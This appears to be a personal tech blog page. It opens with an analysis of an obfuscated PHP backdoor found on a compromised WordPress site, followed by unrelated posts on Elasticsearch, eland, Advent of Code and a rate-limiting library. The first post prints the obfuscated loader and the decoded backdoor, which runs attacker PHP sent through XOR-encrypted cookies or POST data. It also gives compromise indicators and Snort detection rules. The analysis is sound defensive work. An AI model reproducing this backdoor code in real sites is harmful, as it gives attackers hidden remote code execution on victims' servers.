Looking at PHP backdoor malware

Last week I helped out with a Wordpress website that had been infected. The webhosting company detected some malware, but there was more malware that wasn’t detected yet. In this post I’m looking at that malware sample. This PHP file was probably uploaded using a vulnerability in a Wordpress plugin.

The malicious code looked like this:


function asdasd0()
	echo 11111;



function vksXJAdk($Vsgjyqji, $unvnBFtDiJlf)
$Vsgjyqji = urldecode($Vsgjyqji);
$TTlBSYU = str_split($Vsgjyqji);
$action = "";
for ($i = 0; $i < strlen($Vsgjyqji);$i++) {
$action .= $TTlBSYU[$i] ^ $unvnBFtDiJlf[$i%12];
return $action;

$k = vksXJAdk($i, $eByjoghUea);

function asdasd1()
	echo 11111;

$f = vksXJAdk($j, $eByjoghUea);
$f($eByjoghUea, $k);

function asdasd2()
	echo 11111;

include_once ($eByjoghUea);

function asdasd3()
	echo 11111;


function asdasd4()
	echo 11111;


There’s clearly some obfuscation going on. The asdasd functions don’t have a role in the obfuscation. I suspect they are there to decrease the entropy of the file as a whole. This helps avoid detection, since scanning software uses high entropy as an indication that some obfuscation, compression or encryption is being used.

After deobfuscation (running it and setting a breakpoint to inspect the contents of $k), the code looked like this:

@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);

function shdp($data, $key)
    $out_data = "";
    for ($i = 0; $i < strlen($data);) {
        for ($j = 0; $j < strlen($key) && $i < strlen($data); $j++, $i++) {
            $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
    return $out_data;
if (isset($_GET[673435]))
$temp=array_merge($_COOKIE, $_POST);
foreach ($temp as $data_key => $data) {
    $data = @unserialize(shdp(shdp(base64_decode($data), 'zs420ndune7gpn1hwwfgjf1tz52hkfglmt6'), $data_key));
    if (isset($data['ak'])) {
        if ($data['a'] == 'i') {
            $i = array(
                'pv' => @phpversion(),
                'sv' => '1.0-1',
            echo @serialize($i);
        } elseif ($data['a'] == 'e') {

This code gets executed by putting it in a file, running it with include_once, and deleting the file afterwards (unlink). $f contains the string file_put_contents to do so.

Reading this code, we can find a few Indicators Of Compromise (IOC):

  • 673435 is used as a GET parameter. The value is ignored. (Other variations use 47712 as a GET parameter)
  • 6a59bb58c6c03d5103d44f3b7e5ebf07, the MD5 hash of 47712 is a response when this GET parameter is supplied.
  • Base64 encoded cookie or POST data is supplied to the script. Note that there are also many legitimate use cases for doing this, making it easier to blend in with normal traffic. In addition, cookie values and POST data is also less likely to end up in access logs (contrary to GET parameters), which also helps evade detection.

Of course there’s nothing preventing the attacker from changing the constant 673435 (again). My best guess is that this GET parameter can be used to demonstrate a host is compromised. Speculating a bit: this could allow for selling access to the host to others, because this check could be done without knowing the password. The buyer of the access could verify that a URL like https://example.com/wp-content/uploads/malware.php?673435=anything returns 6a59bb58c6c03d5103d44f3b7e5ebf07, before paying for the access.

Only with the password: (zs420ndune7gpn1hwwfgjf1tz52hkfglmt6 in this sample) can the host be used to evaluate arbitrary code. The password varies across the many samples I looked at. It is most likely unique per target. The password is used to decrypt the instructions (that are supplied either in cookies or in POST data). The encryption used is a repeating XOR cipher.

After the data has been demangled, it can contain two instructions. The type of instruction is encoded in the a key.

  • i: return information about the host (backdoor version (1.0-1) and PHP version)
  • e: evaluates PHP code (the code itself is in the d key)

I was curious whether more about this malware was known, so I started looking for earlier detections. I found this StackExchange post from 2018 where someone posts some similar malware with the i and e commands.

Searching Github led me to a useful resource on this strain of PHP malware, the repository bediger4000/php-malware-analysis. This repository contained many different variations collected by Wordpress honeypots, going by the following aliases:

Since the two numeric GET parameters can be converted to a snort rule, I decided to submit these to the snort-sigs mailing list:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SERVER-WEBAPP PHP backdoor check of successful installation using GET parameter 47712"; flow:to_server,established; content:"GET /"; http_uri; content:"47712="; http_uri; classtype:web-application-activity; reference:url,bartbroere.eu/2023/12/31/php-backdoor-malware/; sid:1000001;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SERVER-WEBAPP PHP backdoor check of successful installation using GET parameter 673435"; flow:to_server,established; content:"GET /"; http_uri; content:"673435="; http_uri; classtype:web-application-activity; reference:url,bartbroere.eu/2023/12/31/php-backdoor-malware/; sid:1000002;)

alert tcp $HOME_NET $HTTP_PORTS -> $EXTERNAL_NET any (msg:"SERVER-WEBAPP Indication of a successful PHP backdoor check, server responds with 6a59bb58c6c03d5103d44f3b7e5ebf07"; flow:to_client,established; content:"6a59bb58c6c03d5103d44f3b7e5ebf07"; http_client_body; reference:url,bartbroere.eu/2023/12/31/php-backdoor-malware/; sid:1000003;)

To decrease false positives, you could for example require that .php is in the path. An even better way to decrease false positives would be only raising an alert when rule 1 or 2 and rule 3 are activated. Snort’s activates and activated_by offer this functionality. This could be useful if you are monitoring an application where 673435 and 47712 are legitimate GET parameters, or the MD5 hash of 47712 is a valid server response.

Update: The PHP backdoor signatures have been improved and are now part of the Open Emerging Threats rules, available for download here

Tuning Elasticsearch for performant vector search

I noticed Elasticsearch was a bit slow when using cosineSimilarity on a dense_vector. Before thinking about it at all, I rather naively put all my data in only four indices. The largest of these indices were easily over 200 GB in size, mostly occupied by 512-float vectors. These vectors were already indexed for cosine similarity.

So what made the queries slow? In the background Elasticsearch runs on Lucene, which uses one thread per shard for queries. By default, Elasticsearch uses only one shard per index. This used to be five per index, before Elasticsearch 7. In my case this meant that my 128-core Elasticsearch cluster was using only 4 threads for a search!

Therefore, one of the simplest ways to use more shards (and cores) is to grow the number of indices. At query time this doesn’t have to be a problem, since you can use index patterns to search over multiple indices at once.

However, at some point adding more indices will stop helping. The results from each of the indices need to be merged by Elasticsearch, which will add overhead.

As a simple rule of thumb I would say get the number of cores in your cluster and split your data into that many indices, while keeping the size of indices somewhere between 1 and 10 GB. This maximizes the number of cores used for a search, while keeping the overhead of merging the results relatively small.

If your indices end up a lot smaller than 1 GB, you probably don’t need as many indices as cores. If your indices are still a lot larger than 10 GB, and your queries are not quick enough, you might want to increase the core count of your Elasticsearch cluster.

You can guess the size of your indices in advance by inserting a relative sample of documents. You can check the size of the index on disk (with curl localhost:9200/_cat/indices for example), divide the size by the number of documents, and multiply by the total number of documents you want to index. This gives an idea of the size of the index you will end up with.

To summarize: while Elasticsearch recommends index sizes between 10 and 50 GB, I found that the performance of vector search in particular was better when the indices were between 1 and 10 GB.

Dumping an entire Elasticsearch index to csv with eland

With the 8.11.0 release of the Python package eland it got a lot easier to dump an Elasticsearch index to csv. All the code you need is this:

import eland

eland.DataFrame('http://localhost:9200', 'your-index').to_csv('your-csv.csv')

Before the 8.11.0 release, this method already existed in eland, but it needed as much memory as the size of your dataset. Now it streams the data batch-wise into a csv. Most of the code to achieve this was written by @V1NAY8. I only did some minor edits to get it to pass the pull request review.

While testing this eland successfully dumped hundreds of gigabytes of data without any issues, all without having to bother with scroll requests myself.

Advent of Code 2022 - Day 9 - part 1

To get ready for Advent of Code 2023, I continued where I stopped last year: day 9.

Here’s me struggling for 1 hour and 40 minutes spread across two days, because I tried to be clever. For viewing pleasure it has been sped up.

What goes wrong here is that I assumed incorrectly that a negative number to the power of zero would be -1. Quick maths turned out not to be good maths. The following bit of experimentation led me to believe that.

result = -5 ** 0  
assert result == -1

You may have already guessed that the order of operation fooled me. The ** operator is executed before the - operator is applied to the result. The behaviour is different if I do the same using a variable:

x = -5
result = x ** 0
assert result == 1

The solution that eventually led to the correct answer is in the code block below. After submitting the correct answer, I did some cleanup:

  • deleted some unreachable code
  • linted it
  • removed some debug lines
  • and added some more comments
  • deleted the x ** 0 and y ** 0 since they are pointless now.
from advent_of_code import *
import requests_cache


test_input = """R 4
U 4
L 3
D 1
R 4
D 1
L 5
R 2"""
input_9 = fetch_input(9)
# input_9 = test_input
movements = [x.split(' ') for x in input_9.splitlines()]
movements = [(x[0], int(x[1])) for x in movements]
visited = set()
head = (0, 0)
tail = (0, 0)

directions = {
# What coordinates change for each movement
#         x, y
    "U": (1, 0),
    "D": (-1, 0),
    "L": (0, -1),
    "R": (0, 1),

def modify_location(location, direction):
    if isinstance(direction, str):
        change = directions[direction]
        change = direction
    return location[0] + change[0], location[1] + change[1]

def direction_to_move(head, tail):
    x = head[0] - tail[0]
    y = head[1] - tail[1]
    # head and tail are at the same location, don't move
    if x == 0 and y == 0:  
        return 0, 0
    # head and tail are less than one square apart (including diagonally)
    elif max(abs(x), abs(y)) == 1:  
        return 0, 0
    # head and tail are too far apart, decide which direction to move the tail
        if x < 0:
            x = x ** 0 * -1
            x = 0 if not x else 1
        if y < 0:
            y = -1
            y = 0 if not y else 1
        return x, y

tail_visited = set()
for direction, length in movements:
    for _ in range(length):
        head = modify_location(head, direction)
        tail = modify_location(tail, direction_to_move(head, tail))
        # keep track of where the tail has been:

submit_answer(level=1, day=9, answer=len(tail_visited))

The lessons I learned: Don’t try to be clever and check your maths.

No more 429: Combining ratelimit and requests_cache

requests_cache is nice. ratelimit is nice. But they don’t play nicely together yet: If a request is coming from the cache that requests_cache maintains, ratelimit doesn’t “know that” and will still slow your script down for no reason. That’s why I published the ratelimit_requests_cache module. It offers a similar rate limiter to the ratelimit module, but invocations only count towards the rate limit if the request could not be served from the cache.

The usage is the same as the normal ratelimit package. You decorate a method with the sleep_and_retry and a limiting decorator, in this case the limits_if_not_cached:

import requests
import requests_cache
from ratelimit import sleep_and_retry
from ratelimit_requests_cache import limits_if_not_cached

@limits_if_not_cached(calls=1, period=1)
def get_from_httpbin(i):
    return requests.get(f'https://httpbin.org/anything?i={i}')

# Enable requests caching

# Notice that only the first ten requests will be ratelimited to 1 request / second
# After that, it's a lot quicker since requests can be served from the cache
# and the ratelimiter does not engage
for i in range(100):
    get_from_httpbin(i % 10)

See it in action:

This rate limiter is ideal for when an API call is expensive, measured in either time or in money. HTTP requests have to be performed only once, and you can better avoid getting HTTP 429 status codes.

This rate limiter checks whether a request was served from the cache or not by checking the .from_cache attribute of the Response. That means that if you have a different caching mechanism, you could also set this .from_cache boolean attribute and use the decorator for other purposes just as easily.

To start using it, get it from PyPI:

python3 -m pip install ratelimit_requests_cache